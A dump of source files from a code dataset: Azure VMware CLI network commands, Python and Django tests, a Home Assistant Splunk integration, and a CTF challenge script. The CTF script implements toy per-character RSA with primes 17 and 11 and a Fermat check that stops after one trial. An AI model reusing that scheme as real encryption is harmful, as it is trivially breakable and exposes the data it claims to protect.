return client.workload_networks.begin_delete_dhcp(resource_group_name=resource_group_name, private_cloud_name=private_cloud, dhcp_id=dhcp)
def workload_network_dhcp_list(client: AVSClient, resource_group_name, private_cloud):
return client.workload_networks.list_dhcp(resource_group_name=resource_group_name, private_cloud_name=private_cloud)
def workload_network_dhcp_show(client: AVSClient, resource_group_name, private_cloud, dhcp: str):
return client.workload_networks.get_dhcp(resource_group_name=resource_group_name, private_cloud_name=private_cloud, dhcp_id=dhcp)
def workload_network_dns_services_list(client: AVSClient, resource_group_name, private_cloud):
return client.workload_networks.list_dns_services(resource_group_name=resource_group_name, private_cloud_name=private_cloud)
def workload_network_dns_services_get(client: AVSClient, resource_group_name, private_cloud, dns_service):
return client.workload_networks.get_dns_service(resource_group_name=resource_group_name, private_cloud_name=private_cloud, dns_service_id=dns_service)
def workload_network_dns_services_create(client: AVSClient, resource_group_name, private_cloud, dns_service, display_name=None, dns_service_ip=None, default_dns_zone=None, fqdn_zones=None, log_level=None, revision=None):
from azext_vmware.vendored_sdks.avs_client.models import WorkloadNetworkDnsService
prop = WorkloadNetworkDnsService(display_name=display_name, dns_service_ip=dns_service_ip, default_dns_zone=default_dns_zone, log_level=log_level, revision=revision, fqdn_zones=fqdn_zones)
return client.workload_networks.begin_create_dns_service(resource_group_name=resource_group_name, private_cloud_name=private_cloud, dns_service_id=dns_service, workload_network_dns_service=prop)
def workload_network_dns_services_update(client: AVSClient, resource_group_name, private_cloud, dns_service, display_name=None, dns_service_ip=None, default_dns_zone=None, fqdn_zones=None, log_level=None, revision=None):
from azext_vmware.vendored_sdks.avs_client.models import WorkloadNetworkDnsService
prop = WorkloadNetworkDnsService(display_name=display_name, dns_service_ip=dns_service_ip, default_dns_zone=default_dns_zone, fqdn_zones=fqdn_zones, log_level=log_level, revision=revision)
return client.workload_networks.begin_update_dns_service(resource_group_name=resource_group_name, private_cloud_name=private_cloud, dns_service_id=dns_service, workload_network_dns_service=prop)
def workload_network_dns_services_delete(client: AVSClient, resource_group_name, private_cloud, dns_service):
return client.workload_networks.begin_delete_dns_service(resource_group_name=resource_group_name, private_cloud_name=private_cloud, dns_service_id=dns_service)
def workload_network_dns_zone_list(client: AVSClient, resource_group_name, private_cloud):
return client.workload_networks.list_dns_zones(resource_group_name=resource_group_name, private_cloud_name=private_cloud)
def workload_network_dns_zone_get(client: AVSClient, resource_group_name, private_cloud, dns_zone):
return client.workload_networks.get_dns_zone(resource_group_name=resource_group_name, private_cloud_name=private_cloud, dns_zone_id=dns_zone)
def workload_network_dns_zone_create(client: AVSClient, resource_group_name, private_cloud, dns_zone, display_name=None, domain=None, dns_server_ips=None, source_ip=None, dns_services=None, revision=None):
from azext_vmware.vendored_sdks.avs_client.models import WorkloadNetworkDnsZone
prop = WorkloadNetworkDnsZone(display_name=display_name, domain=domain, dns_server_ips=dns_server_ips, source_ip=source_ip, dns_services=dns_services, revision=revision)
return client.workload_networks.begin_create_dns_zone(resource_group_name=resource_group_name, private_cloud_name=private_cloud, dns_zone_id=dns_zone, workload_network_dns_zone=prop)
def workload_network_dns_zone_update(client: AVSClient, resource_group_name, private_cloud, dns_zone, display_name=None, domain=None, dns_server_ips=None, source_ip=None, dns_services=None, revision=None):
from azext_vmware.vendored_sdks.avs_client.models import WorkloadNetworkDnsZone
prop = WorkloadNetworkDnsZone(display_name=display_name, domain=domain, dns_server_ips=dns_server_ips, source_ip=source_ip, dns_services=dns_services, revision=revision)
return client.workload_networks.begin_update_dns_zone(resource_group_name=resource_group_name, private_cloud_name=private_cloud, dns_zone_id=dns_zone, workload_network_dns_zone=prop)
def workload_network_dns_zone_delete(client: AVSClient, resource_group_name, private_cloud, dns_zone):
return client.workload_networks.begin_delete_dns_zone(resource_group_name=resource_group_name, private_cloud_name=private_cloud, dns_zone_id=dns_zone)
def workload_network_port_mirroring_list(client: AVSClient, resource_group_name, private_cloud):
return client.workload_networks.list_port_mirroring(resource_group_name=resource_group_name, private_cloud_name=private_cloud)
def workload_network_port_mirroring_get(client: AVSClient, resource_group_name, private_cloud, port_mirroring):
return client.workload_networks.get_port_mirroring(resource_group_name=resource_group_name, private_cloud_name=private_cloud, port_mirroring_id=port_mirroring)
def workload_network_port_mirroring_create(client: AVSClient, resource_group_name, private_cloud, port_mirroring, display_name=None, direction=None, source=None, destination=None, revision=None):
from azext_vmware.vendored_sdks.avs_client.models import WorkloadNetworkPortMirroring
prop = WorkloadNetworkPortMirroring(display_name=display_name, direction=direction, source=source, destination=destination, revision=revision)
return client.workload_networks.begin_create_port_mirroring(resource_group_name=resource_group_name, private_cloud_name=private_cloud, port_mirroring_id=port_mirroring, workload_network_port_mirroring=prop)
def workload_network_port_mirroring_update(client: AVSClient, resource_group_name, private_cloud, port_mirroring, display_name=None, direction=None, source=None, destination=None, revision=None):
from azext_vmware.vendored_sdks.avs_client.models import WorkloadNetworkPortMirroring
prop = WorkloadNetworkPortMirroring(display_name=display_name, direction=direction, source=source, destination=destination, revision=revision)
return client.workload_networks.begin_update_port_mirroring(resource_group_name=resource_group_name, private_cloud_name=private_cloud, port_mirroring_id=port_mirroring, workload_network_port_mirroring=prop)
def workload_network_port_mirroring_delete(client: AVSClient, resource_group_name, private_cloud, port_mirroring):
return client.workload_networks.begin_delete_port_mirroring(resource_group_name=resource_group_name, private_cloud_name=private_cloud, port_mirroring_id=port_mirroring)
def workload_network_segment_list(client: AVSClient, resource_group_name, private_cloud):
return client.workload_networks.list_segments(resource_group_name=resource_group_name, private_cloud_name=private_cloud)
def workload_network_segment_get(client: AVSClient, resource_group_name, private_cloud, segment):
return client.workload_networks.get_segment(resource_group_name=resource_group_name, private_cloud_name=private_cloud, segment_id=segment)
def workload_network_segment_create(client: AVSClient, resource_group_name, private_cloud, segment, display_name=None, connected_gateway=None, revision=None, dhcp_ranges=None, gateway_address=None, port_name=None):
from azext_vmware.vendored_sdks.avs_client.models import WorkloadNetworkSegmentPortVif
from azext_vmware.vendored_sdks.avs_client.models import WorkloadNetworkSegmentSubnet
from azext_vmware.vendored_sdks.avs_client.models import WorkloadNetworkSegment
portVif = WorkloadNetworkSegmentPortVif(port_name=port_name)
subnet = WorkloadNetworkSegmentSubnet(dhcp_ranges=dhcp_ranges, gateway_address=gateway_address)
segmentObj = WorkloadNetworkSegment(display_name=display_name, connected_gateway=connected_gateway, subnet=subnet, port_vif=portVif, revision=revision)
return client.workload_networks.begin_create_segments(resource_group_name=resource_group_name, private_cloud_name=private_cloud, segment_id=segment, workload_network_segment=segmentObj)
def workload_network_segment_update(client: AVSClient, resource_group_name, private_cloud, segment, display_name=None, connected_gateway=None, revision=None, dhcp_ranges=None, gateway_address=None, port_name=None):
from azext_vmware.vendored_sdks.avs_client.models import WorkloadNetworkSegmentPortVif
from azext_vmware.vendored_sdks.avs_client.models import WorkloadNetworkSegmentSubnet
from azext_vmware.vendored_sdks.avs_client.models import WorkloadNetworkSegment
portVif = WorkloadNetworkSegmentPortVif(port_name=port_name)
subnet = WorkloadNetworkSegmentSubnet(dhcp_ranges=dhcp_ranges, gateway_address=gateway_address)
segmentObj = WorkloadNetworkSegment(display_name=display_name, connected_gateway=connected_gateway, subnet=subnet, port_vif=portVif, revision=revision)
return client.workload_networks.begin_update_segments(resource_group_name=resource_group_name, private_cloud_name=private_cloud, segment_id=segment, workload_network_segment=segmentObj)
def workload_network_segment_delete(client: AVSClient, resource_group_name, private_cloud, segment):
return client.workload_networks.begin_delete_segment(resource_group_name=resource_group_name, private_cloud_name=private_cloud, segment_id=segment)
def workload_network_public_ip_list(client: AVSClient, resource_group_name, private_cloud):
return client.workload_networks.list_public_i_ps(resource_group_name=resource_group_name, private_cloud_name=private_cloud)
def workload_network_public_ip_get(client: AVSClient, resource_group_name, private_cloud, public_ip):
return client.workload_networks.get_public_ip(resource_group_name=resource_group_name, private_cloud_name=private_cloud, public_ip_id=public_ip)
def workload_network_public_ip_create(client: AVSClient, resource_group_name, private_cloud, public_ip, display_name=None, number_of_public_ips=None):
return client.workload_networks.begin_create_public_ip(resource_group_name=resource_group_name, private_cloud_name=private_cloud, public_ip_id=public_ip, display_name=display_name, number_of_public_i_ps=number_of_public_ips)
def workload_network_public_ip_delete(client: AVSClient, resource_group_name, private_cloud, public_ip):
return client.workload_networks.begin_delete_public_ip(resource_group_name=resource_group_name, private_cloud_name=private_cloud, public_ip_id=public_ip)
def workload_network_vm_group_list(client: AVSClient, resource_group_name, private_cloud):
return client.workload_networks.list_vm_groups(resource_group_name=resource_group_name, private_cloud_name=private_cloud)
def workload_network_vm_group_get(client: AVSClient, resource_group_name, private_cloud, vm_group):
return client.workload_networks.get_vm_group(resource_group_name=resource_group_name, private_cloud_name=private_cloud, vm_group_id=vm_group)
def workload_network_vm_group_create(client: AVSClient, resource_group_name, private_cloud, vm_group, display_name=None, members=None, revision=None):
from azext_vmware.vendored_sdks.avs_client.models import WorkloadNetworkVMGroup
vmGroup = WorkloadNetworkVMGroup(display_name=display_name, members=members, revision=revision)
return client.workload_networks.begin_create_vm_group(resource_group_name=resource_group_name, private_cloud_name=private_cloud, vm_group_id=vm_group, workload_network_vm_group=vmGroup)
def workload_network_vm_group_update(client: AVSClient, resource_group_name, private_cloud, vm_group, display_name=None, members=None, revision=None):
from azext_vmware.vendored_sdks.avs_client.models import WorkloadNetworkVMGroup
vmGroup = WorkloadNetworkVMGroup(display_name=display_name, members=members, revision=revision)
return client.workload_networks.begin_update_vm_group(resource_group_name=resource_group_name, private_cloud_name=private_cloud, vm_group_id=vm_group, workload_network_vm_group=vmGroup)
def workload_network_vm_group_delete(client: AVSClient, resource_group_name, private_cloud, vm_group):
return client.workload_networks.begin_delete_vm_group(resource_group_name=resource_group_name, private_cloud_name=private_cloud, vm_group_id=vm_group)
def workload_network_vm_list(client: AVSClient, resource_group_name, private_cloud):
return client.workload_networks.list_virtual_machines(resource_group_name=resource_group_name, private_cloud_name=private_cloud)
def workload_network_vm_get(client: AVSClient, resource_group_name, private_cloud, virtual_machine):
return client.workload_networks.get_virtual_machine(resource_group_name=resource_group_name, private_cloud_name=private_cloud, virtual_machine_id=virtual_machine)
def workload_network_gateway_list(client: AVSClient, resource_group_name, private_cloud):
return client.workload_networks.list_gateways(resource_group_name=resource_group_name, private_cloud_name=private_cloud)
def workload_network_gateway_get(client: AVSClient, resource_group_name, private_cloud, gateway):
return client.workload_networks.get_gateway(resource_group_name=resource_group_name, private_cloud_name=private_cloud, gateway_id=gateway)
def placement_policy_list(client: AVSClient, resource_group_name, private_cloud, cluster_name):
return client.placement_policies.list(resource_group_name=resource_group_name, private_cloud_name=private_cloud, cluster_name=cluster_name)
def placement_policy_get(client: AVSClient, resource_group_name, private_cloud, cluster_name, placement_policy_name):
return client.placement_policies.get(resource_group_name=resource_group_name, private_cloud_name=private_cloud, cluster_name=cluster_name, placement_policy_name=placement_policy_name)
def placement_policy_vm_create(client: AVSClient, resource_group_name, private_cloud, cluster_name, placement_policy_name, state=None, display_name=None, vm_members=None, affinity_type=None):
from azext_vmware.vendored_sdks.avs_client.models import VmPlacementPolicyProperties
if vm_members is not None and affinity_type is not None:
vmProperties = VmPlacementPolicyProperties(type="VmVm", state=state, display_name=display_name, vm_members=vm_members, affinity_type=affinity_type)
return client.placement_policies.begin_create_or_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, cluster_name=cluster_name, placement_policy_name=placement_policy_name, properties=vmProperties)
return client.placement_policies.begin_create_or_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, cluster_name=cluster_name, placement_policy_name=placement_policy_name)
def placement_policy_vm_host_create(client: AVSClient, resource_group_name, private_cloud, cluster_name, placement_policy_name, state=None, display_name=None, vm_members=None, host_members=None, affinity_type=None):
from azext_vmware.vendored_sdks.avs_client.models import VmHostPlacementPolicyProperties
if vm_members is not None and host_members is not None and affinity_type is not None:
vmHostProperties = VmHostPlacementPolicyProperties(type="VmHost", state=state, display_name=display_name, vm_members=vm_members, host_members=host_members, affinity_type=affinity_type)
return client.placement_policies.begin_create_or_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, cluster_name=cluster_name, placement_policy_name=placement_policy_name, properties=vmHostProperties)
return client.placement_policies.begin_create_or_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, cluster_name=cluster_name, placement_policy_name=placement_policy_name)
def placement_policy_update(client: AVSClient, resource_group_name, private_cloud, cluster_name, placement_policy_name, state=None, vm_members=None, host_members=None):
from azext_vmware.vendored_sdks.avs_client.models import PlacementPolicyUpdate
props = PlacementPolicyUpdate(state=state, vm_members=vm_members, host_members=host_members)
return client.placement_policies.begin_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, cluster_name=cluster_name, placement_policy_name=placement_policy_name, placement_policy_update=props)
def placement_policy_delete(client: AVSClient, resource_group_name, private_cloud, cluster_name, placement_policy_name, yes=False):
from knack.prompting import prompt_y_n
msg = 'This will delete the placement policy. Are you sure?'
if not yes and not prompt_y_n(msg, default="n"):
return None
return client.placement_policies.begin_delete(resource_group_name=resource_group_name, private_cloud_name=private_cloud, cluster_name=cluster_name, placement_policy_name=placement_policy_name)
def virtual_machine_get(client: AVSClient, resource_group_name, private_cloud, cluster_name, virtual_machine):
return client.virtual_machines.get(resource_group_name=resource_group_name, private_cloud_name=private_cloud, cluster_name=cluster_name, virtual_machine_id=virtual_machine)
def virtual_machine_list(client: AVSClient, resource_group_name, private_cloud, cluster_name):
return client.virtual_machines.list(resource_group_name=resource_group_name, private_cloud_name=private_cloud, cluster_name=cluster_name)
def virtual_machine_restrict(client: AVSClient, resource_group_name, private_cloud, cluster_name, virtual_machine, restrict_movement):
from azext_vmware.vendored_sdks.avs_client.models import VirtualMachineRestrictMovementState
return client.virtual_machines.begin_restrict_movement(resource_group_name=resource_group_name, private_cloud_name=private_cloud, cluster_name=cluster_name, virtual_machine_id=virtual_machine, restrict_movement=VirtualMachineRestrictMovementState(restrict_movement))
| 39,345
| 0
| 2,691
|
e8543128623a87ce635f365d99f5095e9399562a
| 2,823
|
py
|
Python
|
tests/storage/repository/test_study.py
|
AntaresSimulatorTeam/antaREST
|
d686d2a86a52737c211ae67f3cee591f559909f2
|
[
"Apache-2.0"
] | 2
|
2021-11-15T09:26:33.000Z
|
2022-02-24T09:53:54.000Z
|
tests/storage/repository/test_study.py
|
AntaresSimulatorTeam/antaREST
|
d686d2a86a52737c211ae67f3cee591f559909f2
|
[
"Apache-2.0"
] | 542
|
2021-01-11T13:23:47.000Z
|
2022-03-31T15:38:10.000Z
|
tests/storage/repository/test_study.py
|
AntaresSimulatorTeam/antaREST
|
d686d2a86a52737c211ae67f3cee591f559909f2
|
[
"Apache-2.0"
] | 1
|
2020-10-01T12:18:15.000Z
|
2020-10-01T12:18:15.000Z
|
from datetime import datetime
from unittest.mock import Mock
from sqlalchemy import create_engine
from sqlalchemy.orm import scoped_session, sessionmaker # type: ignore
from antarest.core.persistence import Base
from antarest.core.utils.fastapi_sqlalchemy import DBSessionMiddleware, db
from antarest.login.model import User, Group
from antarest.study.model import (
Study,
RawStudy,
DEFAULT_WORKSPACE_NAME,
StudyContentStatus,
PublicMode,
)
from antarest.study.repository import StudyMetadataRepository
| 27.144231
| 74
| 0.589444
|
from datetime import datetime
from unittest.mock import Mock
from sqlalchemy import create_engine
from sqlalchemy.orm import scoped_session, sessionmaker # type: ignore
from antarest.core.persistence import Base
from antarest.core.utils.fastapi_sqlalchemy import DBSessionMiddleware, db
from antarest.login.model import User, Group
from antarest.study.model import (
Study,
RawStudy,
DEFAULT_WORKSPACE_NAME,
StudyContentStatus,
PublicMode,
)
from antarest.study.repository import StudyMetadataRepository
def test_cyclelife():
engine = create_engine("sqlite:///:memory:", echo=True)
sess = scoped_session(
sessionmaker(autocommit=False, autoflush=False, bind=engine)
)
user = User(id=0, name="admin")
group = Group(id="my-group", name="group")
Base.metadata.create_all(engine)
DBSessionMiddleware(
Mock(),
custom_engine=engine,
session_args={"autocommit": False, "autoflush": False},
)
with db():
repo = StudyMetadataRepository()
a = Study(
name="a",
version="42",
author="John Smith",
created_at=datetime.now(),
updated_at=datetime.now(),
public_mode=PublicMode.FULL,
owner=user,
groups=[group],
)
b = Study(
name="b",
version="43",
author="Morpheus",
created_at=datetime.now(),
updated_at=datetime.now(),
public_mode=PublicMode.FULL,
owner=user,
groups=[group],
)
a = repo.save(a)
b = repo.save(b)
assert b.id
c = repo.get(a.id)
assert a == c
repo.delete(a.id)
assert repo.get(a.id) is None
def test_study_inheritance():
engine = create_engine("sqlite:///:memory:", echo=True)
sess = scoped_session(
sessionmaker(autocommit=False, autoflush=False, bind=engine)
)
user = User(id=0, name="admin")
group = Group(id="my-group", name="group")
Base.metadata.create_all(engine)
DBSessionMiddleware(
Mock(),
custom_engine=engine,
session_args={"autocommit": False, "autoflush": False},
)
with db():
repo = StudyMetadataRepository()
a = RawStudy(
name="a",
version="42",
author="John Smith",
created_at=datetime.now(),
updated_at=datetime.now(),
public_mode=PublicMode.FULL,
owner=user,
groups=[group],
workspace=DEFAULT_WORKSPACE_NAME,
path="study",
content_status=StudyContentStatus.WARNING,
)
repo.save(a)
b = repo.get(a.id)
assert isinstance(b, RawStudy)
assert b.path == "study"
| 2,248
| 0
| 46
|
6b40f9b7d58392a2be162f00d5852bd1e08b2a0e
| 3,784
|
py
|
Python
|
homeassistant/components/splunk/__init__.py
|
learn-home-automation/core
|
c5d8792c3487e9b418b1e7d623bf59e7dbddd6b7
|
[
"Apache-2.0"
] | 22,481
|
2020-03-02T13:09:59.000Z
|
2022-03-31T23:34:28.000Z
|
homeassistant/components/splunk/__init__.py
|
learn-home-automation/core
|
c5d8792c3487e9b418b1e7d623bf59e7dbddd6b7
|
[
"Apache-2.0"
] | 31,101
|
2020-03-02T13:00:16.000Z
|
2022-03-31T23:57:36.000Z
|
homeassistant/components/splunk/__init__.py
|
learn-home-automation/core
|
c5d8792c3487e9b418b1e7d623bf59e7dbddd6b7
|
[
"Apache-2.0"
] | 11,411
|
2020-03-02T14:19:20.000Z
|
2022-03-31T22:46:07.000Z
|
"""Support to send data to a Splunk instance."""
import asyncio
from http import HTTPStatus
import json
import logging
import time
from aiohttp import ClientConnectionError, ClientResponseError
from hass_splunk import SplunkPayloadError, hass_splunk
import voluptuous as vol
from homeassistant.const import (
CONF_HOST,
CONF_NAME,
CONF_PORT,
CONF_SSL,
CONF_TOKEN,
CONF_VERIFY_SSL,
EVENT_STATE_CHANGED,
)
from homeassistant.helpers import state as state_helper
from homeassistant.helpers.aiohttp_client import async_get_clientsession
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entityfilter import FILTER_SCHEMA
from homeassistant.helpers.json import JSONEncoder
_LOGGER = logging.getLogger(__name__)
DOMAIN = "splunk"
CONF_FILTER = "filter"
DEFAULT_HOST = "localhost"
DEFAULT_PORT = 8088
DEFAULT_SSL = False
DEFAULT_NAME = "HASS"
CONFIG_SCHEMA = vol.Schema(
{
DOMAIN: vol.Schema(
{
vol.Required(CONF_TOKEN): cv.string,
vol.Optional(CONF_HOST, default=DEFAULT_HOST): cv.string,
vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
vol.Optional(CONF_SSL, default=False): cv.boolean,
vol.Optional(CONF_VERIFY_SSL, default=True): cv.boolean,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_FILTER, default={}): FILTER_SCHEMA,
}
)
},
extra=vol.ALLOW_EXTRA,
)
async def async_setup(hass, config):
"""Set up the Splunk component."""
conf = config[DOMAIN]
host = conf.get(CONF_HOST)
port = conf.get(CONF_PORT)
token = conf.get(CONF_TOKEN)
use_ssl = conf[CONF_SSL]
verify_ssl = conf.get(CONF_VERIFY_SSL)
name = conf.get(CONF_NAME)
entity_filter = conf[CONF_FILTER]
event_collector = hass_splunk(
session=async_get_clientsession(hass),
host=host,
port=port,
token=token,
use_ssl=use_ssl,
verify_ssl=verify_ssl,
)
if not await event_collector.check(connectivity=False, token=True, busy=False):
return False
payload = {
"time": time.time(),
"host": name,
"event": {
"domain": DOMAIN,
"meta": "Splunk integration has started",
},
}
await event_collector.queue(json.dumps(payload, cls=JSONEncoder), send=False)
async def splunk_event_listener(event):
"""Listen for new messages on the bus and sends them to Splunk."""
state = event.data.get("new_state")
if state is None or not entity_filter(state.entity_id):
return
try:
_state = state_helper.state_as_number(state)
except ValueError:
_state = state.state
payload = {
"time": event.time_fired.timestamp(),
"host": name,
"event": {
"domain": state.domain,
"entity_id": state.object_id,
"attributes": dict(state.attributes),
"value": _state,
},
}
try:
await event_collector.queue(json.dumps(payload, cls=JSONEncoder), send=True)
except SplunkPayloadError as err:
if err.status == HTTPStatus.UNAUTHORIZED:
_LOGGER.error(err)
else:
_LOGGER.warning(err)
except ClientConnectionError as err:
_LOGGER.warning(err)
except asyncio.TimeoutError:
_LOGGER.warning("Connection to %s:%s timed out", host, port)
except ClientResponseError as err:
_LOGGER.error(err.message)
hass.bus.async_listen(EVENT_STATE_CHANGED, splunk_event_listener)
return True
| 29.333333
| 88
| 0.636892
|
"""Support to send data to a Splunk instance."""
import asyncio
from http import HTTPStatus
import json
import logging
import time
from aiohttp import ClientConnectionError, ClientResponseError
from hass_splunk import SplunkPayloadError, hass_splunk
import voluptuous as vol
from homeassistant.const import (
CONF_HOST,
CONF_NAME,
CONF_PORT,
CONF_SSL,
CONF_TOKEN,
CONF_VERIFY_SSL,
EVENT_STATE_CHANGED,
)
from homeassistant.helpers import state as state_helper
from homeassistant.helpers.aiohttp_client import async_get_clientsession
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entityfilter import FILTER_SCHEMA
from homeassistant.helpers.json import JSONEncoder
_LOGGER = logging.getLogger(__name__)
DOMAIN = "splunk"
CONF_FILTER = "filter"
DEFAULT_HOST = "localhost"
DEFAULT_PORT = 8088
DEFAULT_SSL = False
DEFAULT_NAME = "HASS"
CONFIG_SCHEMA = vol.Schema(
{
DOMAIN: vol.Schema(
{
vol.Required(CONF_TOKEN): cv.string,
vol.Optional(CONF_HOST, default=DEFAULT_HOST): cv.string,
vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
vol.Optional(CONF_SSL, default=False): cv.boolean,
vol.Optional(CONF_VERIFY_SSL, default=True): cv.boolean,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_FILTER, default={}): FILTER_SCHEMA,
}
)
},
extra=vol.ALLOW_EXTRA,
)
async def async_setup(hass, config):
"""Set up the Splunk component."""
conf = config[DOMAIN]
host = conf.get(CONF_HOST)
port = conf.get(CONF_PORT)
token = conf.get(CONF_TOKEN)
use_ssl = conf[CONF_SSL]
verify_ssl = conf.get(CONF_VERIFY_SSL)
name = conf.get(CONF_NAME)
entity_filter = conf[CONF_FILTER]
event_collector = hass_splunk(
session=async_get_clientsession(hass),
host=host,
port=port,
token=token,
use_ssl=use_ssl,
verify_ssl=verify_ssl,
)
if not await event_collector.check(connectivity=False, token=True, busy=False):
return False
payload = {
"time": time.time(),
"host": name,
"event": {
"domain": DOMAIN,
"meta": "Splunk integration has started",
},
}
await event_collector.queue(json.dumps(payload, cls=JSONEncoder), send=False)
async def splunk_event_listener(event):
"""Listen for new messages on the bus and sends them to Splunk."""
state = event.data.get("new_state")
if state is None or not entity_filter(state.entity_id):
return
try:
_state = state_helper.state_as_number(state)
except ValueError:
_state = state.state
payload = {
"time": event.time_fired.timestamp(),
"host": name,
"event": {
"domain": state.domain,
"entity_id": state.object_id,
"attributes": dict(state.attributes),
"value": _state,
},
}
try:
await event_collector.queue(json.dumps(payload, cls=JSONEncoder), send=True)
except SplunkPayloadError as err:
if err.status == HTTPStatus.UNAUTHORIZED:
_LOGGER.error(err)
else:
_LOGGER.warning(err)
except ClientConnectionError as err:
_LOGGER.warning(err)
except asyncio.TimeoutError:
_LOGGER.warning("Connection to %s:%s timed out", host, port)
except ClientResponseError as err:
_LOGGER.error(err.message)
hass.bus.async_listen(EVENT_STATE_CHANGED, splunk_event_listener)
return True
| 0
| 0
| 0
|
a924a3b3fa825a585783593415bcffef891d3164
| 1,915
|
py
|
Python
|
2021_2022/Training_2/RSA_Dream/Cripto_9.py
|
0awawa0/DonNU_CTF
|
7ff693fdba4609298f5556ea583fe604980d76e3
|
[
"MIT"
] | null | null | null |
2021_2022/Training_2/RSA_Dream/Cripto_9.py
|
0awawa0/DonNU_CTF
|
7ff693fdba4609298f5556ea583fe604980d76e3
|
[
"MIT"
] | null | null | null |
2021_2022/Training_2/RSA_Dream/Cripto_9.py
|
0awawa0/DonNU_CTF
|
7ff693fdba4609298f5556ea583fe604980d76e3
|
[
"MIT"
] | null | null | null |
import random
alf=["а","б","в","г","д","е","ё","ж","з","и","й","к","л","м","н","о","п","р","с","т","у","ф","х","ц","ч","ш","щ","ъ","ы","ь","э","ю","я",".",",",":","?"]
zam=[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36]
p=17
q=11
file=open('text.txt',encoding='utf-8')
st1=list(file.read())
file.close()
print(st1)
f,f2=rsa(st1,p,q)
s=sum(f)
print(s)
print(f,f2)
| 19.947917
| 154
| 0.399478
|
import random
def gcd(a,b): #расширенный
x, lasty=0,0
y, lastx=1,1
n=a
m=b
while m!=0:
q=n//m
r=n%m
n=m
m=r
x, lastx = lastx-q*x, x
y, lasty = lasty-q*y, y
return n
def gcdost(a,b): #расширенный
x, lasty=0,0
y, lastx=1,1
n=a
m=b
while m!=0:
q=n//m
r=n%m
n=m
m=r
x, lastx = lastx-q*x, x
y, lasty = lasty-q*y, y
return lastx
def pmnoj(a):
p = []
d = 2
while d * d <= a:
if a % d == 0:
p.append(d)
a //= d
else:
d += 1
if a > 1:
p.append(a)
return p
def ferma(c):
for i in range(1000):
a=random.randint(2, c-2)
b=a**(c-1)%c
if b==1:
return True
else:
return False
def rsa(st1, p,q):
st2=[]
res=[]
res2=[]
p1=ferma(p)
q1=ferma(q)
if not p1 or not q1:
return "Error"
for i in range(len(st1)):
for j in range(len(alf)):
if st1[i]==alf[j]:
st2.append(zam[j])
n=p*q
fn=(p-1)*(q-1)
i=2
while i < fn:
e=gcd(fn,i)
if e==1:
e=i
break
i+=1
d=gcdost(e,fn)
if d<0:
d+=fn
for i in st2:
res.append((i**e)%n)
for i in res:
res2.append((i**d)%n)
return res,res2
alf=["а","б","в","г","д","е","ё","ж","з","и","й","к","л","м","н","о","п","р","с","т","у","ф","х","ц","ч","ш","щ","ъ","ы","ь","э","ю","я",".",",",":","?"]
zam=[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36]
p=17
q=11
file=open('text.txt',encoding='utf-8')
st1=list(file.read())
file.close()
print(st1)
f,f2=rsa(st1,p,q)
s=sum(f)
print(s)
print(f,f2)
| 1,377
| 0
| 123
|
771784edcc7f5296f6cfcf7f2749b285b3a3b2d4
| 2,522
|
py
|
Python
|
accounts/tests.py
|
Panda4817/MySousChef
|
64c3967566b3834d578406884ee6b4a3807b21f8
|
[
"MIT"
] | 1
|
2021-02-25T17:54:28.000Z
|
2021-02-25T17:54:28.000Z
|
accounts/tests.py
|
Panda4817/MySousChef
|
64c3967566b3834d578406884ee6b4a3807b21f8
|
[
"MIT"
] | null | null | null |
accounts/tests.py
|
Panda4817/MySousChef
|
64c3967566b3834d578406884ee6b4a3807b21f8
|
[
"MIT"
] | null | null | null |
from django.test import TestCase, Client
from .models import Profile
from django.contrib.auth.models import User
import unittest
from .forms import SignUpForm
from .signals import show_login_message, show_logout_message
from django.contrib.auth.signals import user_logged_out, user_logged_in
from django.contrib import messages
from django.contrib.messages.middleware import MessageMiddleware
from django.contrib.sessions.middleware import SessionMiddleware
# Create your tests here.
| 37.641791
| 72
| 0.646709
|
from django.test import TestCase, Client
from .models import Profile
from django.contrib.auth.models import User
import unittest
from .forms import SignUpForm
from .signals import show_login_message, show_logout_message
from django.contrib.auth.signals import user_logged_out, user_logged_in
from django.contrib import messages
from django.contrib.messages.middleware import MessageMiddleware
from django.contrib.sessions.middleware import SessionMiddleware
# Create your tests here.
class ModelsTestCase(TestCase):
def setUp(self):
# Create User instance
u = User.objects.create_user('testing', password='hello')
def test_count_user_instance(self):
u = User.objects.filter(username="testing")
self.assertEqual(len(u), 1)
def test_count_profile_instance(self):
u = User.objects.filter(username="testing")
p = Profile.objects.filter(user=u[0])
self.assertEqual(len(p), 1)
def test_index(self):
c = Client()
response = c.get("", secure=True)
self.assertEqual(response.status_code, 200)
def test_register(self):
c = Client()
response = c.get("/register", secure=True)
self.assertEqual(response.status_code, 200)
def test_login(self):
c = Client()
u = User.objects.get_by_natural_key('testing')
request = c.get("/login", secure=True, follow = True)
self.assertEqual(request.status_code, 200)
request2 = c.login(username='testing', password="hello")
self.assertTrue(request2)
def test_logout(self):
c = Client()
u = User.objects.get_by_natural_key('testing')
c.login(username='testing', password="hello")
check = c.get("/logout", secure=True, follow=True)
self.assertRedirects(check, "https://testserver/", 302, 200)
def test_account(self):
c = Client()
u = User.objects.get_by_natural_key('testing')
c.login(username='testing', password="hello")
response = c.get("/account", secure=True, follow=True)
self.assertEqual(response.status_code, 200)
def test_contact(self):
c = Client()
response = c.get("/contact", secure=True)
self.assertEqual(response.status_code, 200)
c.login(username='testing', password="hello")
response2 = c.get("/contact", secure=True)
self.assertEqual(response2.status_code, 200)
| 1,699
| 10
| 314
|
ad5dd51fc7ed9905b46da578dce076efe35092ef
| 5,679
|
py
|
Python
|
gooddata-sdk/gooddata_sdk/catalog/data_source/declarative_model/data_source.py
|
gooddata/gooddata-python-sdk
|
